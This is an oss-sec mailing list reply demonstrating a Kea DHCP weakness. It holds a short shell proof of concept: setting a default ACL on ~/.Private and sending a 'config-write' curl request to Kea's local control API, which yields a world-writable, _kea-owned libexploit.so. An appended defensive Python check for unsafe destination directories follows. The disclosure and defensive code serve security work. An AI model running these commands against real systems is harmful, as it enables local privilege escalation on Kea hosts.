oss-sec
mailing list archives
From: Jakub Wilk <jwilk () jwilk net>
Date: Wed, 28 May 2025 20:23:25 +0200
* Matthias Gerstner <mgerstner () suse de>, 2025-05-28 19:21:
> By leveraging issue 3.2), the Kea services can be instructed to create
> `_kea` owned files in the attacker's `$HOME/.Private`. The content of
> the created files is not fully attacker controlled, however, so it will
> not be possible to craft a valid ELF object for loading via `dlopen()`
> this way. By placing a setgid-directory in `$HOME/.Private/evil-dir`,
> any files created in this directory will even have the group-ownership
> of the attacker. The file mode will be 0644, however,
Default ACLs to the rescue!
$ chmod a+x ~
$ mkdir -m 777 ~/.Private
$ setfacl -d -m u:$LOGNAME:rwx ~/.Private/
$ curl -s -H "Content-Type: application/json" -d '{ "command": "config-write", "arguments": { "filename": "'"$HOME"'/.Private/libexploit.so" } }' localhost:8000 > /dev/null
$ echo pwned > ~/.Private/libexploit.so
$ ls -l ~/.Private/libexploit.so
-rw-rw-rw-+ 1 _kea _kea 6 May 28 18:15 /home/jwilk/.Private/libexploit.so
$ cat ~/.Private/libexploit.so
pwned
--
Jakub Wilk
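The transcript above shows why a service cannot rely on the mode it gives a newly created file: a default ACL on the parent directory adds entries to every file created inside it. The following is an added example, not code from the post or from the Kea project, of the pre-write check a service could apply before honouring a caller-supplied destination path. The function name `unsafe_components`, the `allowed_root` parameter and the use of the `system.posix_acl_default` extended attribute as a default-ACL indicator are this example's own assumptions; the checks it performs (directory ownership, group/other write bits, default ACL) are exactly the properties the demonstration relies on.

```python
"""Added example (not from the oss-sec post or the Kea project): refuse to
write a file whose directory chain could have been prepared by another
user, which is the precondition for the default-ACL trick shown above."""
import os
import stat
import tempfile


def directory_has_default_acl(path: str) -> bool:
    """Best-effort default-ACL detection (assumption: Linux stores it as the
    'system.posix_acl_default' xattr).  Filesystems without xattr support,
    or platforms without listxattr, simply report 'no ACL'."""
    try:
        return "system.posix_acl_default" in os.listxattr(path)
    except (OSError, AttributeError):
        return False


def unsafe_components(target: str, allowed_root: str,
                      trusted_uids=(0,)) -> list:
    """Return a list of reasons why `target` must not be written.

    `target` has to lie strictly below `allowed_root`.  Every directory from
    the parent of `target` up to and including `allowed_root` must be owned
    by a trusted uid (root or the service's own uid), must not be writable
    by group or others, and must not carry a default ACL.  Symlinks are
    resolved first, so a link pointing outside the root is rejected too.
    An empty list means the destination passed every check.
    """
    real = os.path.realpath(target)
    root = os.path.realpath(allowed_root)
    if real == root or os.path.commonpath([real, root]) != root:
        return [f"{target} is outside the allowed root {root}"]

    reasons = []
    d = os.path.dirname(real)
    while True:
        st = os.stat(d)  # a missing directory raises; let the caller decide
        mode = stat.S_IMODE(st.st_mode)
        if st.st_uid not in trusted_uids:
            reasons.append(f"{d}: owned by uid {st.st_uid}, which is not trusted")
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            reasons.append(f"{d}: writable by group or others (mode {mode:04o})")
        if directory_has_default_acl(d):
            reasons.append(f"{d}: carries a default ACL")
        if d == root:
            break
        d = os.path.dirname(d)
    return reasons


if __name__ == "__main__":
    # Constructed demo: a world-writable subdirectory like the post's
    # ~/.Private next to a properly restricted one.
    base = tempfile.mkdtemp()
    evil = os.path.join(base, ".Private")
    os.mkdir(evil)
    os.chmod(evil, 0o777)
    conf = os.path.join(base, "conf")
    os.mkdir(conf)
    os.chmod(conf, 0o755)
    me = os.getuid()
    for dest in (os.path.join(evil, "libexploit.so"),
                 os.path.join(conf, "kea.conf"),
                 "/etc/passwd"):
        problems = unsafe_components(dest, base, trusted_uids=(0, me))
        print(dest, "->", "OK" if not problems else problems)
```

The ACL probe is deliberately best effort: where it cannot be evaluated the ownership and mode checks still reject any directory another account could have created, which is what stopped the `config-write` path above from being a safe place to write in the first place.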